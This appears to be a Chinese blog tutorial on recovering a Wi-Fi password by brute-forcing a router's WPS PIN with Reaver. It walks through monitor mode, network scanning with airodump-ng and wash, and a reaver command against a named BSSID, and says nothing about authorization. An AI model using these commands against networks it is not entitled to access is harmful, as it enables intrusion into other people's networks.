ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

时间:2021-03-27 17:13:32

  路由器的WPS功能

  很多路由器都有WPS功能, 这边的WPS不是office工具软件, 而是路由器的一个功能:

  路由器中WPS是由Wi-Fi联盟所推出的全新Wi-Fi安全防护设定(Wi-Fi Protected Setup)标准,该标准推出的主要原因是为了解决长久以来无线网络加密认证设定的步骤过于繁杂艰难之弊病,使用者往往会因为步骤太过麻烦,以致干脆不做任何加密安全设定,因而引发许多安全上的问题。WPS用于简化Wi-Fi无线的安全设置和网络管理。它支持两种模式:个人识别码(PIN)模式按钮(PBC)模式

  原理

  只要获取路由器的PIN码, 我们就可以不输入用户名和密码连上路由器, 而这个PIN码通过穷举法是可以破解出来的, 我们所用Reaver这个软件破解PIN码

  安装Reaver

  打开终端命令行, 输入以下命令安装Reaver

apt-get update

   更新完成之后,再输入

apt-get install reaver

  安装过程,请等待....

  监听本地WIFI信号

  打开终端,输入 ifconfig,  查看本地的网卡接口, 因为我这边系统是双系统,目前的环境为ubuntu, Mac自带的网卡无法将网卡设置为监听模式:

ifconfig

ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

  将无线网卡设置为监控模式:假设你的无线网卡接口名称为wlx001d0f04f093,执行下列命令,将无线网卡设置为监控模式 :

sudo airmon-ng start wlx001d0f04f093

  再执行:sudo airodump-ng mon0, 获取附近的WIFI信号:

sudo airodump-ng mon0

ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

  我们的目标为最后一个路由器, 路由器的ESSID:princess, BSSID : 5C:63:BF:C4:A4:CE

  参看附近所有有WPS功能的路由器

  我们使用wash这个命令, 可以查看到附近有开WPS功能的路由器, 在控制台输入一下代码, mon0为混杂模式的网卡端口, 查看结果如下图:

sudo wash -i mon0

ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

  使用Reaver破解无线网络的WPA密码

  在终端中执行下列命令,用你实际获取到的BSSID替换命令中的bssid:  reaver -i moninterface -b bssid -vv :

  我这边测试机的命令为:

sudo reaver -i mon0 -b 5C::BF:C4:A4:CE -vv 

  过了几分钟以后, 破解的密码就出现了, PIN码为00001304, 破解出来的密码为 abcde

ubuntu-16.04(linux)使用Reaver爆破wifi密码(路由器的WPS功能漏洞)

  所用Bully 破解

  Bully也是一款破解路由器密码的安全软件, github这边有相关的代码:https://github.com/aanarchyy/bully ,使用Bully之前,也必须把网卡设置为混杂模式

  参考

  WPS功能:百度百科

  Reaver: http://www.2cto.com/article/201204/129296.html

  Mac系统安装Aircrack-ng破解附近wifi密码(1) :http://www.cnblogs.com/diligenceday/p/6344487.html

  Mac系统安装Aircrack-ng破解wifi密码(2):http://www.cnblogs.com/diligenceday/p/6323431.html

  Bully:https://github.com/aanarchyy/bully    

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

QQ:287101329

微信:18101055830